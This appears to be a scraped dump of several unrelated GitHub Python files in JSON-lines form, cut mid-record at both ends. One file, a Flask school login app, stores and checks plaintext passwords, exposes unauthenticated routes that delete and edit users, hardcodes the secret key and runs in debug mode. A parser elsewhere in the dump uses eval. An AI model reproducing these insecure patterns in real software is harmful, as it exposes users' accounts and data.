re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n line = [\n i\n for i in range(len(content))\n if \" end pairs... done in \" in content[i]\n ][0]\n series[\"paired-ends\"] = re.sub(\n \"\\D\", \"\", re.sub(\"\\.\\.\\..*\", \"\", content[line])\n )\n line = [\n i\n for i in range(len(content))\n if \" duplicates, sorting the list... done in \" in content[i]\n ][0]\n series[\"duplicates\"] = re.sub(\n \"\\D\", \"\", re.sub(\"\\.\\.\\..*\", \"\", content[line])\n )\n except IndexError:\n pass\n return series\n\n def parse_qc(self, qc_file):\n \"\"\"\n Parse phantompeakqualtools (spp) QC table and return quality metrics.\n\n :param str qc_file: Path to phantompeakqualtools output file, which\n contains sample quality measurements.\n \"\"\"\n import pandas as pd\n\n series = pd.Series()\n try:\n with open(qc_file) as handle:\n line = (\n handle.readlines()[0].strip().split(\"\\t\")\n ) # list of strings per line\n series[\"NSC\"] = line[-3]\n series[\"RSC\"] = line[-2]\n series[\"qualityTag\"] = line[-1]\n except:\n pass\n return series\n\n def get_peak_number(self, sample):\n \"\"\"\n Counts number of peaks from a sample's peak file.\n\n :param pipelines.Sample sample: Sample object with \"peaks\" attribute.\n \"\"\"\n proc = subprocess.Popen([\"wc\", \"-l\", sample.peaks], stdout=subprocess.PIPE)\n out, err = proc.communicate()\n sample[\"peakNumber\"] = re.sub(\"\\D.*\", \"\", out)\n return sample\n\n def get_frip(self, sample):\n \"\"\"\n Calculates the fraction of reads in peaks for a given sample.\n\n :param pipelines.Sample sample: Sample object with \"peaks\" attribute.\n \"\"\"\n import pandas as pd\n\n with open(sample.frip, \"r\") as handle:\n content = handle.readlines()\n reads_in_peaks = int(re.sub(\"\\D\", \"\", content[0]))\n mapped_reads = sample[\"readCount\"] - sample[\"unaligned\"]\n return pd.Series(reads_in_peaks / mapped_reads, index=\"FRiP\")\n","repo_name":"databio/pypiper","sub_path":"pypiper/ngstk.py","file_name":"ngstk.py","file_ext":"py","file_size_in_byte":82806,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"61"} +{"seq_id":"30639480944","text":"from flask import Blueprint\nfrom flask_restful import Api\n\nfrom eproc.resources.vendor.vendor import (\n VendorDetailResource,\n VendorResource\n)\n\nvendor_blueprint = Blueprint(\"vendor_blueprint\", __name__, url_prefix=\"/vendor\")\n\nvendor_api = Api(vendor_blueprint)\n\nvendor_api.add_resource(VendorResource, \"\")\nvendor_api.add_resource(VendorDetailResource, 
\"/details\")\n","repo_name":"keyinvoker/svc-procurement","sub_path":"eproc/blueprints/vendor.py","file_name":"vendor.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40921653554","text":"#!/usr/bin/python\n#\n# Practice Python Exercise #5\n# https://www.practicepython.org/exercise/2014/03/05/05-list-overlap.html\n# New Edit, for the sake of GIT / edit 1\n# Take two lists, say for example these two:\na = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nb = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\nc = []\n\n# and write a program that returns a list that contains only the elements that are \n# common between the lists (without duplicates). Make sure your program works on two\n# lists of different sizes.\n# Extras:\n# ** Randomly generate two lists to test this\n# ** Write this in one line of Python\nprint (\"Welcome to exercise 5: List Overlaps.\")\nprint (\"First iteration is with predefined lists called 'a' and 'b':\")\nif len(a) >= len(b):\n for i in range(len(b)):\n if b[i] in a:\n if b[i] not in c: # Have to make sure we aren't duplicating a number that is already in our c list.\n c.append(b[i])\nelse:\n for i in range(len(a)):\n if a[i] in b:\n if a[i] not in c: # Have to make sure we aren't duplicating a number that is already in our c list.\n c.append(a[i])\n\n# print(set(c)) # Probably cheaty to use a set to print only the unique values\nprint (\"List A:\",a)\nprint (\"List B:\",b)\nprint (\"Overlaps:\",c)\n\n# Generate two lists of a random length, with random numbers in it\n# and print a list that has the overlaps between the two lists.\n\n#Create 3 empty lists\nx = []\ny = []\nz = []\n\nimport random # Needed for random numbers\n\ndef gen_r_list(stop, start=0): # Function to generate a list of varying sizes, composed of random numbers 0-10. \n iter=start\n while iter <= stop:\n yield random.randint(0,10)\n iter += 1\n\nsize1 = random.randint(5,15) # Get a random size for the first list x[]\nsize2 = random.randint(5,15) # Get a random size for the second list y[]\nwhile size2 == size1: # Make sure the second list, y[], is not equal in size to x[]\n size2 = random.randint(5,15)\n print (size1, size2)\n\nx = list(gen_r_list(size1))\ny = list(gen_r_list(size2))\n\n# Now that we've created both lists, lets create a list of overlapping values\n\nif len(x) >= len(y):\n for i in range(len(y)):\n if y[i] in x:\n if y[i] not in z: # Have to make sure we aren't duplicating a number that is already in our z list.\n z.append(y[i])\nelse:\n for i in range(len(x)):\n if x[i] in y:\n if x[i] not in z: # Have to make sure we aren't duplicating a number that is already in our z list.\n z.append(x[i])\n\nprint(\"Challenge #2: Randomly generate two lists to test non-duplicated overlaps between lists\")\nprint (\"List X: \",x,\"size:\",int(size1))\nprint (\"List Y: \",y,\"size:\",int(size2))\nprint (\"Overlaps: \",sorted(z)) # If you want to use z.sort() here you have to do z.sort() on a given line by itself, and then print it. You can't do print(z.sort()). 
(Why? Because list.sort() sorts the list in place and returns None, so print(z.sort()) would just print None.)\n","repo_name":"dpalmero1971/python_exercises","sub_path":"ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6295263267","text":"from flask import Flask, render_template, flash, url_for, logging, request, redirect, session, jsonify, make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import desc\nimport json\nfrom datetime import datetime\nfrom functools import wraps\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///school.db'\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\ndb = SQLAlchemy(app)\n\n\nclass Users(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    username = db.Column(db.String(50), nullable=False)\n    email = db.Column(db.String(50), nullable=False)\n    password = db.Column(db.String(50), nullable=False)\n    role = db.Column(db.String(20), nullable=False)\n    # created_date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n    def __repr__(self):\n        return '{\"id\":\"'+str(self.id) + '\", \"username\":\"' + str(self.username) + '\", \"email\":\"'+str(self.email)+'\",'+ '\"role\":\"'+str(self.role)+'\"}'\n\n\n# Check if is admin\ndef is_admin(f):\n    @wraps(f)\n    def wrap(*args, **kwargs):\n        if session['role'] == 'admin':\n            return f(*args, **kwargs)\n        else:\n            return redirect(url_for('login'))\n    return wrap\n\n# Check if user logged in\n\n\ndef is_logged_in(f):\n    @wraps(f)\n    def wrap(*args, **kwargs):\n        if 'logged_in' in session:\n            return f(*args, **kwargs)\n        else:\n            return redirect(url_for('login'))\n    return wrap\n\n\n@app.route('/')\ndef index():\n\n    return render_template('index.html')\n\n\n@app.route('/admin')\n@is_logged_in\n@is_admin\ndef admin():\n    all_users = Users.query.order_by(desc(Users.id)).all()\n    return render_template('admin.html', users=all_users)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\n    if request.method == 'POST':\n        email = request.form['email']\n        password = request.form['password']\n        user = Users.query.filter_by(\n            password=password,\n            email=email\n        ).first()\n        if user:\n            session['logged_in'] = True\n            session['username'] = user.username\n            session['role'] = user.role\n            session['user_id'] = user.id\n            if session['role'] == 'admin':\n                return redirect(url_for('admin'))\n            else:\n                return render_template('dashboard.html', user=user)\n\n        else:\n            msg = 'Invalid Login'\n            return render_template('login.html', msg=msg)\n    else:\n        return render_template('login.html')\n\n\n@app.route('/register', methods=['POST', 'GET'])\n@app.route('/add-person', methods=['POST', 'GET'])\ndef register():\n\n    if request.method == 'POST':\n        username = request.form['username']\n        email = request.form['email']\n        password = request.form['password']\n        role = request.form['role']\n        new_user = Users(\n            username=username,\n            email=email,\n            password=password,\n            role=role\n        )\n        db.session.add(new_user)\n        db.session.commit()\n        if request.form['redirect'] == 'admin':\n            return redirect(url_for('admin'))\n        else:\n            return redirect('/login')\n    else:\n        return render_template('register.html')\n\n\n@app.route('/user/delete/<int:id>')\ndef delete_user(id):\n    user = Users.query.get_or_404(id)\n    db.session.delete(user)\n    db.session.commit()\n    return redirect(url_for('admin'))\n\n\n@app.route('/user/get/<int:id>')\ndef get_user(id):\n    user = Users.query.get_or_404(id)\n    return user\n\n\n@app.route('/search', methods=['GET', 'POST'])\ndef search():\n\n    results = []\n    if request.method == 'POST':\n        
search = request.form['search']\n        if search != '':\n            results = Users.query.filter(Users.username.like(search)).all()\n        else:\n            results = Users.query.order_by(desc(Users.id)).all()\n\n    return render_template('admin.html', users=results)\n\n\n@app.route('/profile/update/<int:id>', methods=['GET', 'POST'])\ndef profile_edit(id):\n\n    user = Users.query.get_or_404(id)\n\n    if request.method == 'POST':\n        user.username = request.form['username']\n        user.email = request.form['email']\n        user.password = request.form['password']\n        db.session.commit()\n\n    return redirect(url_for('dashboard'))\n\n\n@app.route('/dashboard')\n@is_logged_in\ndef dashboard():\n    user_id = session['user_id']\n    user = Users.query.get_or_404(user_id)\n    return render_template('dashboard.html', user=user)\n\n# Logout\n@app.route('/logout')\n@is_logged_in\ndef logout():\n    session.clear()\n    flash('You are now logged out', 'success')\n    return redirect(url_for('login'))\n\n\nif __name__ == \"__main__\":\n    app.secret_key = 'secret123'\n    app.run(debug=True)\n","repo_name":"qadeesz/python-flask-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16817921873","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\nimport math as math\nfrom matplotlib import pyplot\nfrom matplotlib import cm\nfrom shapely.geometry import LineString\n\nimport tsdf\n\ndef circular_weighted_average(angles, weights):\n    summed_weight = 0\n    summed_y = 0\n    summed_x =0\n    for i in range(len(angles)):\n        summed_y += np.sin(angles[i]) * weights[i]\n        summed_x += np.cos(angles[i]) * weights[i]\n    return math.atan2(summed_y,summed_x)\n    \n    \n\ndef getRaytracingHelperVariables(observation_origin, observation_ray,t_start, t_end, grid_size_inv):\n    traversal_start = observation_origin + t_start * observation_ray\n    traversal_end = observation_origin + t_end * observation_ray\n    traversal_start_scaled = traversal_start * grid_size_inv\n    traversal_end_scaled = traversal_end * grid_size_inv\n    traversal_ray_scaled = traversal_end_scaled - traversal_start_scaled\n    traversal_ray_scaled_inv =(1. / traversal_ray_scaled[0], 1. 
/ traversal_ray_scaled[1])\n grid_index = np.round(traversal_start_scaled)\n grid_step = np.sign(traversal_ray_scaled)\n t_max = (grid_index - traversal_start_scaled) * traversal_ray_scaled_inv\n t_delta = grid_step * traversal_ray_scaled_inv\n return grid_index, grid_step, t_max, t_delta\n\ndef unit_vector(vector):\n return vector / np.linalg.norm(vector)\n\ndef toTwoPi(value):\n if(value > math.pi):\n return toTwoPi(value - 2 * math.pi) #value % math.pi\n if(value < - math.pi):\n return toTwoPi(value + 2 * math.pi) #value % -math.pi\n return value\n\ndef angle_between(v1, v2):\n v1_normalized = unit_vector(v1)\n v2_normalized = unit_vector(v2)\n return toTwoPi(angle(v1)-angle(v2))\n\ndef angle(v):\n v_normalized = unit_vector(v)\n return math.atan2(v_normalized[1], v_normalized[0]) \n \ndef distanceLinePoint(line_p0, line_p1, point):\n numerator = np.abs((line_p1[1]-line_p0[1])*point[0] - (line_p1[0]-line_p0[0])*point[1] + line_p1[0]*line_p0[1] - line_p1[1]*line_p0[0]) \n denominator = np.linalg.norm(line_p1-line_p0)\n return numerator/denominator \n\ndef gaussian(x, mu=0, sigma=1):\n return 1/(math.sqrt(2*math.pi)*sigma**2)*math.e**(-0.5*((x-mu)/sigma**2)**2)\n\nclass ScanNormalTSDFRangeInserter: \n \n def __init__(self, use_normals_weight=False, n_normal_samples=8, default_weight=1, use_distance_cell_to_observation_weight=False, use_distance_cell_to_ray_weight=False, use_scale_distance=False, normal_distance_factor=1, max_weight=1000, draw_normals_scan_indices=[0], use_distance_cell_to_hit = False):\n self.use_normals_weight = use_normals_weight\n self.use_distance_cell_to_observation_weight = use_distance_cell_to_observation_weight\n self.sigma_distance_cell_to_observation_weight = 1.0\n self.use_distance_cell_to_ray_weight = use_distance_cell_to_ray_weight\n self.sigma_distance_cell_to_ray_weight = 0.6\n self.n_normal_samples = n_normal_samples\n self.default_weight = default_weight\n self.normal_distance_factor = normal_distance_factor #0 --> all normals same weight, 1 --> f(0)=1, f(0.1)=0.9 f(0.2)=0.82 independent of distance, inf -->only closest normal counts\n self.max_weight = max_weight\n self.draw_normals_scan_indices = draw_normals_scan_indices\n self.num_inserted_scans = 0\n self.use_scale_distance = use_scale_distance\n self.use_distance_cell_to_hit = use_distance_cell_to_hit\n print(self)\n \n def __str__(self):\n return \"ScanNormalTSDFRangeInserter \\n use_normals_weight %s \\n n_normal_samples %s\\n default_weight %s\\n normal_distance_factor %s\\n\" % (self.use_normals_weight, self.n_normal_samples, self.default_weight, self.normal_distance_factor)\n \n \n def updateCell(self, tsdf, cell_index, update_distance, ray_length, update_weight): \n if(abs(update_distance)< tsdf.truncation_distance):\n updated_weight = min(tsdf.getWeight(cell_index) + update_weight, self.max_weight)\n updated_tsdf = (tsdf.getTSDF(cell_index) * tsdf.getWeight(cell_index) + update_distance * update_weight) / (update_weight + tsdf.getWeight(cell_index)) \n tsdf.setWeight(cell_index, updated_weight)\n tsdf.setTSDF(cell_index, updated_tsdf)\n #tsdf.setWeight(cell_index, 0.5)\n #tsdf.setTSDF(cell_index, 0.5) \n\n \n def computeNormal(self, sample, neighbors, sample_origin):\n normals = []\n normal_distances = []\n normal_weights = []\n for neighbor in neighbors:\n sample_to_neighbor = sample - neighbor\n origin_to_neighbor = sample_origin - neighbor\n origin_to_sample = sample_origin - sample\n sample_to_neighbor_rotated = np.array([-sample_to_neighbor[1],sample_to_neighbor[0]])\n 
if(sample_to_neighbor_rotated.dot(origin_to_sample) > 0):\n sample_to_neighbor = -sample_to_neighbor\n \n tangent_angle = angle(sample_to_neighbor)\n normal_angle = toTwoPi(tangent_angle - math.pi/2)\n normals += [normal_angle]\n normal_distance = np.linalg.norm(sample-neighbor)\n normal_distances += [normal_distance]\n normal_weights += [math.e**(-self.normal_distance_factor * normal_distance)]\n \n normals = np.array(normals)\n normal_weights = np.array(normal_weights)\n normal_mean = circular_weighted_average(normals, normal_weights)\n delta = normals-normal_mean\n delta_flipped = (normals-normal_mean)-2*math.pi\n is_min_delta = np.abs(delta) < np.abs(delta_flipped)\n min_deltas = delta*is_min_delta + delta_flipped*(1-is_min_delta)\n normal_var = np.average((min_deltas-normal_mean)**2, weights=normal_weights)\n normal_weight_sum = np.sum(normal_weights)\n return normal_mean, normal_var, normal_weight_sum\n \n def drawScanWithNormals(self, hits, normal_orientations, sensor_origin, normal_weights, normal_variances, normal_angle_to_ray):\n fig = plt.figure()\n ax = plt.subplot(311)\n x_val = [x[0] for x in hits]\n y_val = [x[1] for x in hits]\n sc = ax.scatter(x_val, y_val, c=normal_weights, marker='x', cmap=cm.jet)\n plt.colorbar(sc)\n ax.scatter(sensor_origin[0], sensor_origin[1], marker='x')\n for idx, normal_orientation in enumerate(normal_orientations): \n normal_scale = 0.1\n dx = normal_scale*np.cos(normal_orientation)\n dy = normal_scale*np.sin(normal_orientation) \n ax.arrow(x_val[idx], y_val[idx], dx, dy, fc='k', ec='k', color='b')\n ax.set_aspect('equal') \n plt.title('Normal Estimation Weights')\n ''' \n ax = plt.subplot(412)\n x_val = [x[0] for x in hits]\n y_val = [x[1] for x in hits]\n sc = ax.scatter(x_val, y_val, c=normal_variances, marker='x', cmap=cm.jet)\n plt.colorbar(sc)\n ax.scatter(sensor_origin[0], sensor_origin[1], marker='x')\n for idx, normal_orientation in enumerate(normal_orientations): \n normal_scale = 0.1\n dx = normal_scale*np.cos(normal_orientation)\n dy = normal_scale*np.sin(normal_orientation) \n ax.arrow(x_val[idx], y_val[idx], dx, dy, fc='k', ec='k', color='b')\n ax.set_aspect('equal')\n plt.title('Normal Estimation Variances')\n ''' \n ax = plt.subplot(312)\n x_val = [x[0] for x in hits]\n y_val = [x[1] for x in hits]\n sc = ax.scatter(x_val, y_val, c=np.cos(normal_angle_to_ray), marker='x', cmap=cm.jet)\n plt.colorbar(sc)\n ax.scatter(sensor_origin[0], sensor_origin[1], marker='x')\n for idx, normal_orientation in enumerate(normal_orientations): \n normal_scale = 0.1\n dx = normal_scale*np.cos(normal_orientation)\n dy = normal_scale*np.sin(normal_orientation) \n ax.arrow(x_val[idx], y_val[idx], dx, dy, fc='k', ec='k', color='b')\n ax.set_aspect('equal')\n plt.title('Angle normal to ray')\n \n ax = plt.subplot(313)\n x_val = [x[0] for x in hits]\n y_val = [x[1] for x in hits]\n combined_weights = np.reciprocal(np.sqrt(np.array(normal_variances))) * (np.square(np.array(normal_weights))) * np.square(np.cos(normal_angle_to_ray))\n combined_weights = np.cos(normal_angle_to_ray)\n sc = ax.scatter(x_val, y_val, c=combined_weights, marker='x', cmap=cm.jet)\n plt.colorbar(sc)\n ax.scatter(sensor_origin[0], sensor_origin[1], marker='x')\n for idx, normal_orientation in enumerate(normal_orientations): \n normal_scale = 0.1\n dx = normal_scale*np.cos(normal_orientation)\n dy = normal_scale*np.sin(normal_orientation) \n ax.arrow(x_val[idx], y_val[idx], dx, dy, fc='k', ec='k', color='b')\n ax.set_aspect('equal')\n plt.title('Combined weight')\n \n \n def 
insertScan(self, tsdf, hits, origin):\n origin = np.array(origin)\n hits = np.array(hits)\n n_hits = len(hits)\n normal_orientations = []\n normal_orientation_variances = []\n normal_estimation_weight_sums = []\n normal_estimation_angles_to_ray = []\n normal_estimation_angle_to_ray = 0\n normal_orientation = 0\n for idx, hit in enumerate(hits): \n #print('origin',origin) \n #print('hit',hit) \n hit = np.array(hit)\n ray = hit - origin \n \n if self.use_normals_weight or True:\n neighbor_indices = np.array(list(range(idx-int(np.floor(self.n_normal_samples/2)), idx)) + list(range(idx+1, idx+int(np.ceil(self.n_normal_samples/2) + 1))))\n neighbor_indices = neighbor_indices[neighbor_indices >= 0]\n neighbor_indices = neighbor_indices[neighbor_indices < n_hits]\n normal_orientation, normal_var, normal_estimation_weight_sum = self.computeNormal(hit, hits[neighbor_indices], origin)\n normal_orientations += [normal_orientation]\n normal_estimation_weight_sums += [normal_estimation_weight_sum]\n normal_orientation_variances += [normal_var]\n normal_estimation_angle_to_ray = normal_orientation - angle(-ray)\n normal_estimation_angles_to_ray += [normal_estimation_angle_to_ray] # \n \n ray_range = np.linalg.norm(ray) \n range_inv = 1.0 / ray_range\n t_truncation_distance = tsdf.truncation_distance * range_inv\n t_start = 1.0 - t_truncation_distance\n t_end = 1.0 + t_truncation_distance\n grid_index, grid_step, t_max, t_delta = getRaytracingHelperVariables(origin, ray, t_start,t_end, 1. / tsdf.resolution)\n t = 0\n while t < 1.0 : \n #print('t',t,'t_max',t_max,'t_delta',t_delta) \n #print('grid_index',grid_index)\n t_next = np.min(t_max)\n min_coeff_idx = np.argmin(t_max)\n sampling_point = grid_index * tsdf.resolution #origin + (t + t_next)/2 * ray\n #print('sampling_point',sampling_point,'t',origin + (t) * ray,'tn',origin + (t_next) * ray)\n cell_index = tsdf.getCellIndexAtPosition(sampling_point)\n cell_center = tsdf.getPositionAtCellIndex(cell_index)\n distance_cell_center_to_origin = np.linalg.norm(cell_center - origin)\n distance_cell_center_to_hit = np.linalg.norm(cell_center - hit)\n update_weight = 1\n update_distance = ray_range - distance_cell_center_to_origin\n #use_distance_cell_to_observation_weight\n if self.use_normals_weight:\n update_weight = np.cos(normal_estimation_angle_to_ray)\n if(update_weight < 0):\n print('WARNING update_weight=',update_weight)\n if self.use_distance_cell_to_observation_weight:\n normalized_distance_cell_to_observation = np.abs(ray_range - distance_cell_center_to_origin)/tsdf.resolution\n distance_cell_to_observation_weight = gaussian(normalized_distance_cell_to_observation, 0, self.sigma_distance_cell_to_observation_weight) \n ''' \n distance_cell_to_observation_weight = np.abs((tsdf.truncation_distance - np.abs(ray_range - distance_cell_center_to_origin))/tsdf.truncation_distance)\n '''\n update_weight *= distance_cell_to_observation_weight\n if distance_cell_to_observation_weight < 0:\n print('WARNING distance_cell_to_observation_weight=',distance_cell_to_observation_weight)\n if self.use_distance_cell_to_ray_weight:\n distance_cell_to_ray = distanceLinePoint(origin, hit, cell_center)/tsdf.resolution\n #distance_cell_to_ray_weight = distance_cell_to_ray\n distance_cell_to_ray_weight = gaussian(distance_cell_to_ray, 0, self.sigma_distance_cell_to_ray_weight) \n update_weight *= distance_cell_to_ray_weight\n if distance_cell_to_ray_weight < 0:\n print('WARNING distance_cell_to_ray_weight=',distance_cell_to_ray_weight)\n \n if self.use_scale_distance:\n 
#print(np.array([np.cos(normal_orientation), np.sin(normal_orientation)]))\n                update_distance = (cell_center - hit).dot(np.array([np.cos(normal_orientation), np.sin(normal_orientation)]))\n            if self.use_distance_cell_to_hit:\n                update_distance = distance_cell_center_to_hit\n            if self.use_distance_cell_to_hit and self.use_scale_distance:\n                print('CONFIGURATION ERROR')\n            \n            \n            self.updateCell(tsdf, cell_index, update_distance , ray_range, update_weight)\n            #print('cell_index', cell_index)   \n            t = t_next\n            grid_index[min_coeff_idx] += grid_step[min_coeff_idx]\n            t_max[min_coeff_idx] += t_delta[min_coeff_idx]\n        if self.use_normals_weight:\n            if self.num_inserted_scans in self.draw_normals_scan_indices :\n                self.drawScanWithNormals(hits, normal_orientations, origin, normal_estimation_weight_sums, normal_orientation_variances, normal_estimation_angles_to_ray)\n                self.draw_normals = False\n            #print('avg normal error', np.mean(np.abs(normal_orientations)))\n            pass\n        self.num_inserted_scans += 1\n","repo_name":"kdaun/ray_simulator","sub_path":"tsdf_inserter.py","file_name":"tsdf_inserter.py","file_ext":"py","file_size_in_byte":14871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18901291967","text":"# Generator function\ndef my_range(end):\n    number = -1\n    while number < end - 1:\n        number += 1\n        yield number\n\n\n# for item in my_range(5):\n#     print(item)\n\n# generator = iterable + iterator\n\n\nlist01 = [5, 1, 7, 5, 4, 6, 10]\n\n\ndef get_num(list_target):\n    list_res = []\n    for item in list_target:\n        if not item % 2:\n            list_res.append(item)\n    return list_res  # return exits for good; to return several results you must collect them all first, then return them together\n\n\ndef get_res(list_target):  # calling the function does not run it; it returns a generator object = iterable + iterator\n    for item in list_target:\n        if not item % 2:\n            yield item  # leave temporarily, resume later\n\n\nprint(get_num(list01))\n\n# def get_res(list_target):\n#     index = 0\n#     while index < len(list_target):\n#         if not list01[index] % 2:\n#             yield list_target[index]\n#         index += 1\n#\n#\n# for i in get_res(list01):\n#     print(i)\n","repo_name":"QiWang-SJTU/AID1906","sub_path":"Part1 Python base/03Python_core/03Exercise_code/Day16/exercise09.py","file_name":"exercise09.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"691514515","text":"from offregister_fab_utils.apt import apt_depends\nfrom offregister_fab_utils.fs import cmd_avail\nfrom offregister_fab_utils.git import clone_or_update\n\n\ndef install_plugin(c, repo_team, repo_name, location=None):\n    \"\"\"\n    :param c: Connection\n    :type c: ```fabric.connection.Connection```\n    \"\"\"\n\n    apt_depends(c, \"git\")\n    cmd = \"dokku\"\n    if not cmd_avail(c, cmd):\n        raise EnvironmentError(\n            \"Install {cmd} before installing plugins\".format(cmd=cmd)\n        )\n    with c.cd(\"/var/lib/dokku/plugins\"):\n        clone_or_update(c, team=repo_team, repo=repo_name, to_dir=location or repo_name)\n    c.run(\"dokku plugins-install\")\n","repo_name":"offscale/offregister","sub_path":"offregister/aux_recipes/dokku_plugin.py","file_name":"dokku_plugin.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11684215589","text":"# mldesigner package contains the command_component which can be used to define component from a python function\nimport logging\nfrom pathlib import Path\n\nfrom mldesigner import command_component, Input, Output\n\nURI_FOLDER = \"uri_folder\"\n\n\n@command_component(\n    display_name=\"Evaluate\",\n    
environment=\"./environment.conda.yaml\",\n)\ndef evaluate_step(\n model_input: Input(type=URI_FOLDER),\n images_input: Input(type=URI_FOLDER),\n model_output: Output(type=URI_FOLDER),\n integration_output: Output(type=URI_FOLDER),\n):\n from evaluate import evaluate\n\n evaluate(logging, Path(model_input), Path(images_input),\n Path(model_output), Path(integration_output))\n\n\n","repo_name":"guillaume-thomas/MLOpsPython-2022-2023","sub_path":"train/evaluate/azureml_step.py","file_name":"azureml_step.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"8551947307","text":"def answer(question):\n parts = question.split()\n expression = []\n operations = {\n 'plus': '+', 'minus': '-', 'multiplied': '*', 'divided': '/'\n }\n for part in parts:\n if part.isdecimal():\n expression.append(part)\n elif part[-1] == '?':\n try:\n expression.append(str(int(part[:-1])))\n except ValueError:\n if part[:-1] not in operations.keys():\n if len(expression) == 0 and question == 'What is?':\n raise ValueError(\"syntax error\")\n raise ValueError(\"unknown operation\")\n else:\n expression.append(part[:-1])\n elif part in operations.keys():\n expression.append(part)\n elif part[0] == '-':\n expression.append(part)\n\n if len(expression) == 1:\n if expression[0] not in operations.keys():\n return int(expression[0])\n else:\n raise ValueError(\"syntax error\")\n\n valid_mask = [part not in operations.keys() for part in expression]\n\n if not valid_mask[0] or not valid_mask[-1]:\n raise ValueError(\"syntax error\")\n\n if len(valid_mask) % 2 == 0:\n if expression[-2] == 'multiplied':\n raise ValueError(\"unknown operation\")\n if not valid_mask[1] and not valid_mask[2]:\n raise ValueError(\"syntax error\")\n if valid_mask[-2] and valid_mask[-1]:\n raise ValueError(\"syntax error\")\n raise ValueError(\"unknown operation\")\n\n if valid_mask[1]:\n raise ValueError(\"syntax error\")\n\n result = 0\n op = ''\n for part in expression:\n if part in operations.keys():\n op = part\n else:\n if op:\n result = int(eval(f'{result}{operations[op]}{part}'))\n op = ''\n else:\n result += int(part)\n return result\n\n\nif __name__ == '__main__':\n print(answer(\"What is 7 plus multiplied by -2?\"))\n #print(answer(\"What is 1 plus 2 1?\"))\n #print(answer(\"What is 7 plus multiplied by -2?\"))\n #print(answer('What is 52?'))\n #print(answer('What is -3 plus 7 multiplied by -2?'))\n #print(answer('What is 52 cubed?'))\n #print(answer('What is 25 divided by 5?'))\n #print(answer('What is 3 plus 2 multiplied by 3?'))\n\n","repo_name":"itsanti/exercism","sub_path":"python/wordy/wordy.py","file_name":"wordy.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39861309353","text":"import os\r\nfrom dotenv import load_dotenv\r\nimport random \r\nimport hashlib\r\nimport requests\r\nimport pdb\r\nload_dotenv('../.env')\r\n\r\ngoogle_client_id = os.getenv('GOOGLE_CLIENT_ID')\r\ngoogle_client_secret = os.getenv('GOOGLE_CLIENT_SECRET')\r\n\r\nclass Authentication:\r\n def __init__(self):\r\n self.google_state = None\r\n pass\r\n\r\n def check(session):\r\n try:\r\n if session[\"logged_in\"] == None or session[\"logged_in\"] == False:\r\n return False\r\n else:\r\n return True\r\n except KeyError:\r\n return False\r\n\r\n def authGoogle():\r\n scope = ['https://www.googleapis.com/auth/userinfo.email', 
'https://www.googleapis.com/auth/userinfo.profile']\r\n\r\n #generate random md5 string for state\r\n state = hashlib.md5(str(random.getrandbits(256)).encode('utf-8')).hexdigest()\r\n google_url = f'https://accounts.google.com/o/oauth2/v2/auth?scope={\"%20\".join(scope)}&redirect_uri=http://localhost:5000/auth/google/callback&response_type=code&client_id={google_client_id}&state={state}'\r\n \r\n return {\r\n 'google_url': google_url,\r\n 'state': state\r\n }\r\n\r\n def getGoogleToken(code):\r\n \"\"\"\r\n {\r\n \"access_token\": \"xxxxxxxxxxxxxxx\",\r\n \"expires_in\": 3920,\r\n \"token_type\": \"Bearer\",\r\n \"scope\": \"https://www.googleapis.com/auth/drive.metadata.readonly\",\r\n \"refresh_token\": \"xxxxxxxxxxxxxxxxxxxxx\"\r\n }\r\n \"\"\"\r\n \r\n \r\n data = {\r\n 'code': code,\r\n 'client_id': google_client_id,\r\n 'client_secret': google_client_secret,\r\n 'redirect_uri': 'http://localhost:5000/auth/google/callback',\r\n 'grant_type': 'authorization_code'\r\n }\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.post('https://oauth2.googleapis.com/token', data=data, headers=headers)\r\n return response.json()\r\n","repo_name":"viniciuspereiras/OAuth-playground","sub_path":"blueprints/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74544647554","text":"from user_drive_database import userVerification, createDatabaseConnections\nimport json\nimport os\n# [\n# {\"userLoggedIn\":\"boolean_value\", \"UserAccess\":\"access_level\"},\n# {\"name\":\"drive_name\", \"gameName\":\"game_name\", \"gameSize\":\"int(gameSize)\", \"sizeMetric\":\"gameSizeMetric\", \"gameTags\":\"[listOfTags]\",\"dateAdded\":\"mm/dd/yyyyy\",\"playTime\":\"YYYY:DD:HH:MM\"},\n# ['username','password','email','dir_to_drive_database','dir_to_game_database', int(acclev), int(randid)],\n# int(randID_sentByBrowser)\n# 